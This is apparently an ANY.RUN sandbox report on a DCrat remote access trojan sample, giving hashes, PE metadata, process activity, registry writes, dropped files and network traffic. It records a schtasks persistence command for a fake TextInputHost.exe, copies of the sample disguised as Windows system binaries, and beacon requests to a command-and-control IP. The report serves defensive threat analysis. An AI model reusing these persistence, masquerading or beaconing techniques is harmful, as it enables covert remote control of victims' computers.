| File name: | 1 (645) |
| Full analysis: | https://app.any.run/tasks/6c46c2c0-d2b3-4753-b752-93f92e721cdf |
| Verdict: | Malicious activity |
| Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
| Analysis date: | March 25, 2025, 02:02:49 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections |
| MD5: | 63FA59F7C83EC1DF2EAC00CC85696830 |
| SHA1: | 799E9EA365E4AD95C05D21E275E72438882AD776 |
| SHA256: | F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 |
| SSDEEP: | 24576:YK3K2JOe2JKJJJKJKi6CDvLgiuaClaXfD9vUha+Q:YK3K2JOe2JKJJJKJKi6CDvLgiuvM9mQ |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (55.8) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (21) |
| .scr | | | Windows screen saver (9.9) |
| .dll | | | Win32 Dynamic Link Library (generic) (5) |
| .exe | | | Win32 Executable (generic) (3.4) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2022:07:24 15:13:08+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 8 |
| CodeSize: | 904192 |
| InitializedDataSize: | 1536 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xdeb9e |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 169.854.61.441 |
| ProductVersionNumber: | 757.987.69.529 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Dynamic link library |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Unicode |
| ProductName: | CJ1F4wlu3Yfeqm |
| CompanyName: | uoOl |
| InternalName: | jXKHZpCgkrqOe.exe |
| LegalCopyright: | H7Zj92Uf |
| Comments: | buJx |
| OriginalFileName: | 75.exe |
| ProductVersion: | 757.987.69.529 |
| FileVersion: | 169.854.61.441 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 516 | "C:\WINDOWS\System32\OpenWith.exe" "C:\Users\admin\Saved Games\fontdrvhost.exe'" | C:\Windows\System32\OpenWith.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Pick an app Exit code: 2147943623 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 632 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fdabf4fc-288d-49eb-85f4-defccd6ac5c3.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 664 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a4d93f32-3abb-467e-9f40-84c3b2dea3d0.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 672 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ef8a0ddc-4397-4379-9a43-7de35d89bbb2.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 812 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\8a76be34-f10a-491e-8a84-0fb1b4bae432.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1012 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\65ddb95e-9e36-4848-ab4c-7121fffdcb1c.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1168 | schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\admin\Documents\My Videos\TextInputHost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1452 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\6bbaf9c8-6b1f-4f9a-b034-5d3194a35038.vbs" | C:\Windows\System32\wscript.exe | — | sihost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1616 | "C:\Users\All Users\sihost.exe" | C:\ProgramData\sihost.exe | wscript.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1628 | "C:\WINDOWS\System32\OpenWith.exe" "C:\Users\admin\Saved Games\uhssvc.exe'" | C:\Windows\System32\OpenWith.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Pick an app Exit code: 2147943623 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (2384) 1 (645).exe | Key: | HKEY_CURRENT_USER\SOFTWARE\1503bc9c21f231ae19efa518937e2004c3aa4200 |
| Operation: | write | Name: | 728dfd2402fcf49cf9b77cc7c0e105d1deef8c81 |
Value: WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxMb2NhbFxcVGVtcFxcMSAoNjQ1KS5leGUiLCJDOlxcVXNlcnNcXGFkbWluXFxEb2N1bWVudHNcXE15IFZpZGVvc1xcVGV4dElucHV0SG9zdC5leGUiLCJDOlxcVXNlcnNcXGFkbWluXFxTYXZlZCBHYW1lc1xcZm9udGRydmhvc3QuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXERvd25sb2Fkc1xcQXBwbGljYXRpb25GcmFtZUhvc3QuZXhlIiwiQzpcXFVzZXJzXFxhZG1pblxcRG9jdW1lbnRzXFxzZXJ2aWNlcy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXFNhdmVkIEdhbWVzXFxNZW1vcnkgQ29tcHJlc3Npb24uZXhlIiwiQzpcXFVzZXJzXFxBbGwgVXNlcnNcXHNpaG9zdC5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXFBpY3R1cmVzXFxjc3Jzcy5leGUiLCJDOlxcVXNlcnNcXGFkbWluXFxTYXZlZCBHYW1lc1xcdWhzc3ZjLmV4ZSJd | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids |
| Operation: | write | Name: | VBSFile |
Value: | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASMANCS |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASMANCS |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (7792) sihost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\sihost_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2384 | 1 (645).exe | — | ||
MD5:— | SHA256:— | |||
| 2384 | 1 (645).exe | C:\Users\Public\Downloads\6dd19aba3e2428 | text | |
MD5:10A6552C87974C7EDD7132BEA36B9FED | SHA256:496812F15294FD63B78FB4164E2A9E6868EA7A67C6EBCF5DB69610657FC10833 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Saved Games\5b884080fd4f94 | text | |
MD5:FC1843C63C6DE1372512C4E41EB0E715 | SHA256:446BF4814579B8994D246AD5DD0ECBB37EA2EE11063679176CD09BA6482C8887 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Saved Games\fontdrvhost.exe | executable | |
MD5:63FA59F7C83EC1DF2EAC00CC85696830 | SHA256:F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 | |||
| 2384 | 1 (645).exe | C:\Users\Public\Downloads\ApplicationFrameHost.exe | executable | |
MD5:63FA59F7C83EC1DF2EAC00CC85696830 | SHA256:F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Documents\c5b4cb5e9653cc | text | |
MD5:7196F5927378B17162702D86886BACFE | SHA256:BA13AF02FAFF44B8913F8221402FC4278547020E64ACEB373423E62DA330E514 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Videos\TextInputHost.exe | executable | |
MD5:63FA59F7C83EC1DF2EAC00CC85696830 | SHA256:F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Videos\22eafd247d37c3 | text | |
MD5:69639408422D90607C3E2B169008F1C7 | SHA256:71E17881E051F5F0866C8900A1FA5AFD2EB1887549D37F8F7537DD56CB450780 | |||
| 2384 | 1 (645).exe | C:\Users\admin\Documents\services.exe | executable | |
MD5:63FA59F7C83EC1DF2EAC00CC85696830 | SHA256:F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 | |||
| 2384 | 1 (645).exe | C:\Users\Default\Saved Games\Memory Compression.exe | executable | |
MD5:63FA59F7C83EC1DF2EAC00CC85696830 | SHA256:F6E8AD2F79264F067063144585DD8840A8AE0768C4F7F68EDCDA045AD3BEE1C6 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7792 | sihost.exe | GET | 404 | 178.250.158.26:80 | http://178.250.158.26/4downloads4Provider/geoBigload/6/CpuGeomariadb2/Longpoll9/pipe/universal1/4/2http/dumpgame/temporaryTempprotonProton/19protonBetter/Windows/geo/3WpProviderCpu/GeoimageLongpoll/providerimagecpu9/vmLineapiflowertemporary.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&28ca204ef45011c24f2d6ad0f9fc2401=7f73ee0588e870007d71044e34f403bc&6887f5e4da6e991132b0dcee6bb6e919=wM1IDOjV2YkR2YlFWOiFmY3kTN5UjNkVmNhNWZ2Q2YxYzM2QjM3ADN&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc | unknown | — | — | malicious |
7692 | backgroundTaskHost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
7792 | sihost.exe | GET | 404 | 178.250.158.26:80 | http://178.250.158.26/4downloads4Provider/geoBigload/6/CpuGeomariadb2/Longpoll9/pipe/universal1/4/2http/dumpgame/temporaryTempprotonProton/19protonBetter/Windows/geo/3WpProviderCpu/GeoimageLongpoll/providerimagecpu9/vmLineapiflowertemporary.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&28ca204ef45011c24f2d6ad0f9fc2401=7f73ee0588e870007d71044e34f403bc&6887f5e4da6e991132b0dcee6bb6e919=wM1IDOjV2YkR2YlFWOiFmY3kTN5UjNkVmNhNWZ2Q2YxYzM2QjM3ADN&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc | unknown | — | — | malicious |
7484 | SIHClient.exe | GET | 200 | 104.119.109.218:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5132 | sihost.exe | GET | 404 | 178.250.158.26:80 | http://178.250.158.26/4downloads4Provider/geoBigload/6/CpuGeomariadb2/Longpoll9/pipe/universal1/4/2http/dumpgame/temporaryTempprotonProton/19protonBetter/Windows/geo/3WpProviderCpu/GeoimageLongpoll/providerimagecpu9/vmLineapiflowertemporary.php?1gP3GpbdZL95SJAlvqQs2NWxirjez=RYxe5x6hd&jHjjptz9kt9rz2DoJcVY=6oJ4k&28ca204ef45011c24f2d6ad0f9fc2401=7f73ee0588e870007d71044e34f403bc&6887f5e4da6e991132b0dcee6bb6e919=wM1IDOjV2YkR2YlFWOiFmY3kTN5UjNkVmNhNWZ2Q2YxYzM2QjM3ADN&1gP3GpbdZL95SJAlvqQs2NWxirjez=RYxe5x6hd&jHjjptz9kt9rz2DoJcVY=6oJ4k | unknown | — | — | malicious |
5132 | sihost.exe | GET | 404 | 178.250.158.26:80 | http://178.250.158.26/4downloads4Provider/geoBigload/6/CpuGeomariadb2/Longpoll9/pipe/universal1/4/2http/dumpgame/temporaryTempprotonProton/19protonBetter/Windows/geo/3WpProviderCpu/GeoimageLongpoll/providerimagecpu9/vmLineapiflowertemporary.php?1gP3GpbdZL95SJAlvqQs2NWxirjez=RYxe5x6hd&jHjjptz9kt9rz2DoJcVY=6oJ4k&28ca204ef45011c24f2d6ad0f9fc2401=7f73ee0588e870007d71044e34f403bc&6887f5e4da6e991132b0dcee6bb6e919=wM1IDOjV2YkR2YlFWOiFmY3kTN5UjNkVmNhNWZ2Q2YxYzM2QjM3ADN&1gP3GpbdZL95SJAlvqQs2NWxirjez=RYxe5x6hd&jHjjptz9kt9rz2DoJcVY=6oJ4k | unknown | — | — | malicious |
7484 | SIHClient.exe | GET | 200 | 104.119.109.218:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3216 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 20.190.159.128:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
arc.msn.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
7792 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
5132 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
1616 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
6744 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
7548 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
7700 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
8020 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
3676 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
7348 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
1812 | sihost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |